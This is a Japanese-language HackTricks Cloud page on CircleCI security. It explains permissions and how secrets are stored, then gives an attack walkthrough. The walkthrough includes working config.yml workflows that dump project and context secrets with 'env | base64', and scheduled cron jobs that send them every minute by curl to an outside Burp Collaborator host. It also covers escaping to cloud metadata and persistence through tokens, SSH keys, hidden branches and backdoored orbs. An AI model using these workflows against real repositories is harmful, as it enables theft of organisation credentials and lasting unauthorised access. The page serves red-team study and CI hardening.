HackTricks CloudCircleCI セキュリティ
Reading time: 12 minutes
tip
AWSハッキングを学び、実践する:
HackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、実践する:
HackTricks Training GCP Red Team Expert (GRTE)
Azureハッキングを学び、実践する:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricksをサポートする
- サブスクリプションプランを確認してください!
- **💬 Discordグループまたはテレグラムグループに参加するか、Twitter 🐦 @hacktricks_liveをフォローしてください。
- HackTricksおよびHackTricks CloudのGitHubリポジトリにPRを提出してハッキングトリックを共有してください。
基本情報
CircleCI は、コードに対して何をいつ行うかを示すテンプレートを定義できる継続的インテグレーションプラットフォームです。このようにして、例えばリポジトリのマスターブランチから直接テストやデプロイを自動化できます。
権限
CircleCIは、ログインするアカウントに関連するgithubおよびbitbucketから権限を継承します。
私のテストでは、githubのリポジトリに対する書き込み権限があれば、CircleCIでのプロジェクト設定を管理できることを確認しました(新しいsshキーの設定、プロジェクトのapiキーの取得、新しいCircleCI設定での新しいブランチの作成など)。
ただし、CircleCIプロジェクトにリポジトリを変換するには、リポジトリ管理者である必要があります。
環境変数と秘密情報
ドキュメントによると、ワークフロー内で環境変数に値をロードする方法はいくつかあります。
組み込み環境変数
CircleCIによって実行されるすべてのコンテナには、CIRCLE_PR_USERNAME、CIRCLE_PROJECT_REPONAME、CIRCLE_USERNAMEのようなドキュメントに定義された特定の環境変数が常にあります。
プレーンテキスト
コマンド内でプレーンテキストとして宣言できます:
- run:
name: "set and echo"
command: |
SECRET="A secret"
echo $SECRET
実行環境内に明示的に宣言できます:
- run:
name: "set and echo"
command: echo $SECRET
environment:
SECRET: A secret
build-job 環境内に明示的に宣言できます:
jobs:
build-job:
docker:
- image: cimg/base:2020.01
environment:
SECRET: A secret
コンテナの環境内に明示的に宣言できます:
jobs:
build-job:
docker:
- image: cimg/base:2020.01
environment:
SECRET: A secret
プロジェクトの秘密
これらは秘密であり、プロジェクト(任意のブランチ)によってのみアクセス可能です。
これらは https://app.circleci.com/settings/project/github/<org_name>/<repo_name>/environment-variables に宣言されているのを見ることができます。
.png)
caution
"変数のインポート" 機能は、他のプロジェクトから変数をインポートすることを可能にします。
コンテキストの秘密
これらは組織全体の秘密です。デフォルトでは、任意のリポジトリがここに保存された任意の秘密にアクセスできるようになります:
.png)
tip
ただし、異なるグループ(すべてのメンバーの代わりに)を選択して特定の人々にのみ秘密へのアクセスを与えることができます。
これは現在、秘密のセキュリティを向上させるための最良の方法の1つであり、すべての人がアクセスできるのではなく、一部の人だけがアクセスできるようにします。
攻撃
プレーンテキストの秘密を検索
VCS(例えばgithub)にアクセスできる場合、各リポジトリの各ブランチの .circleci/config.yml ファイルをチェックし、そこに保存されている潜在的なプレーンテキストの秘密を検索します。
秘密の環境変数とコンテキストの列挙
コードをチェックすることで、各 .circleci/config.yml ファイルで使用されているすべての秘密の名前を見つけることができます。また、これらのファイルからコンテキスト名を取得するか、ウェブコンソールで確認できます: https://app.circleci.com/settings/organization/github/<org_name>/contexts。
プロジェクトの秘密を抽出
warning
すべてのプロジェクトおよびコンテキストの秘密を抽出するには、全体のgithub組織の中でたった1つのリポジトリに書き込み**アクセスを持っているだけで済みます(そしてあなたのアカウントはコンテキストにアクセスできる必要がありますが、デフォルトでは誰でもすべてのコンテキストにアクセスできます)。
caution
"変数のインポート" 機能は、他のプロジェクトから変数をインポートすることを可能にします。したがって、攻撃者はすべてのリポジトリからすべてのプロジェクト変数をインポートし、その後すべてを一緒に抽出することができます。
すべてのプロジェクトの秘密は常にジョブの環境に設定されているため、envを呼び出してbase64で難読化するだけで、ワークフローのウェブログコンソールに秘密を抽出できます:
version: 2.1
jobs:
exfil-env:
docker:
- image: cimg/base:stable
steps:
- checkout
- run:
name: "Exfil env"
command: "env | base64"
workflows:
exfil-env-workflow:
jobs:
- exfil-env
ウェブコンソールにアクセスできないが、リポジトリにアクセスでき、CircleCIが使用されていることがわかっている場合、毎分トリガーされるワークフローを作成し、外部アドレスに秘密を流出させることができます:
version: 2.1
jobs:
exfil-env:
docker:
- image: cimg/base:stable
steps:
- checkout
- run:
name: "Exfil env"
command: "curl https://lyn7hzchao276nyvooiekpjn9ef43t.burpcollaborator.net/?a=`env | base64 -w0`"
# I filter by the repo branch where this config.yaml file is located: circleci-project-setup
workflows:
exfil-env-workflow:
triggers:
- schedule:
cron: "* * * * *"
filters:
branches:
only:
- circleci-project-setup
jobs:
- exfil-env
コンテキストシークレットの抽出
コンテキスト名を指定する必要があります(これによりプロジェクトシークレットも抽出されます):
version: 2.1
jobs:
exfil-env:
docker:
- image: cimg/base:stable
steps:
- checkout
- run:
name: "Exfil env"
command: "env | base64"
workflows:
exfil-env-workflow:
jobs:
- exfil-env:
context: Test-Context
ウェブコンソールにアクセスできないが、リポジトリにアクセスでき、CircleCIが使用されていることがわかっている場合、毎分トリガーされるワークフローを修正し、外部アドレスに秘密を流出させることができます:
version: 2.1
jobs:
exfil-env:
docker:
- image: cimg/base:stable
steps:
- checkout
- run:
name: "Exfil env"
command: "curl https://lyn7hzchao276nyvooiekpjn9ef43t.burpcollaborator.net/?a=`env | base64 -w0`"
# I filter by the repo branch where this config.yaml file is located: circleci-project-setup
workflows:
exfil-env-workflow:
triggers:
- schedule:
cron: "* * * * *"
filters:
branches:
only:
- circleci-project-setup
jobs:
- exfil-env:
context: Test-Context
warning
新しい .circleci/config.yml をリポジトリに作成するだけでは circleci ビルドをトリガーするには不十分です。circleci コンソールでプロジェクトとして有効にする必要があります。
クラウドへのエスケープ
CircleCI は あなたのビルドを彼らのマシンまたはあなた自身のマシンで実行するオプションを提供します。
デフォルトでは、彼らのマシンは GCP にあり、最初は関連する情報を見つけることはできません。しかし、もし被害者が 自分のマシン(潜在的にクラウド環境で)でタスクを実行している場合、興味深い情報が含まれたクラウドメタデータエンドポイントを見つけるかもしれません。
前の例ではすべてが Docker コンテナ内で起動されましたが、VM マシンを起動するように要求することもできます(異なるクラウド権限を持っている可能性があります):
jobs:
exfil-env:
#docker:
# - image: cimg/base:stable
machine:
image: ubuntu-2004:current
リモートDockerサービスにアクセスできるDockerコンテナでも。
jobs:
exfil-env:
docker:
- image: cimg/base:stable
steps:
- checkout
- setup_remote_docker:
version: 19.03.13
Persistence
- CircleCIでユーザートークンを作成して、ユーザーのアクセスでAPIエンドポイントにアクセスすることが可能です。
- https://app.circleci.com/settings/user/tokens
- プロジェクトトークンを作成して、トークンに与えられた権限でプロジェクトにアクセスすることが可能です。
- https://app.circleci.com/settings/project/github/<org>/<repo>/api
- プロジェクトにSSHキーを追加することが可能です。
- https://app.circleci.com/settings/project/github/<org>/<repo>/ssh
- 予期しないプロジェクトの隠れたブランチにcronジョブを作成して、毎日すべてのコンテキスト環境変数を漏洩させることが可能です。
- あるいは、ブランチで作成したり、知られているジョブを修正して、毎日すべてのコンテキストとプロジェクトの秘密を漏洩させることができます。
- GitHubのオーナーであれば、未確認のオーブを許可し、ジョブにバックドアとして設定することができます。
- 一部のタスクでコマンドインジェクションの脆弱性を見つけ、秘密の値を変更してコマンドを注入することができます。
tip
AWSハッキングを学び、実践する:HackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、実践する:HackTricks Training GCP Red Team Expert (GRTE)
Azureハッキングを学び、実践する:HackTricks Training Azure Red Team Expert (AzRTE)
HackTricksをサポートする
- サブスクリプションプランを確認してください!
- **💬 Discordグループまたはテレグラムグループに参加するか、Twitter 🐦 @hacktricks_liveをフォローしてください。
- HackTricksおよびHackTricks CloudのGitHubリポジトリにPRを提出してハッキングトリックを共有してください。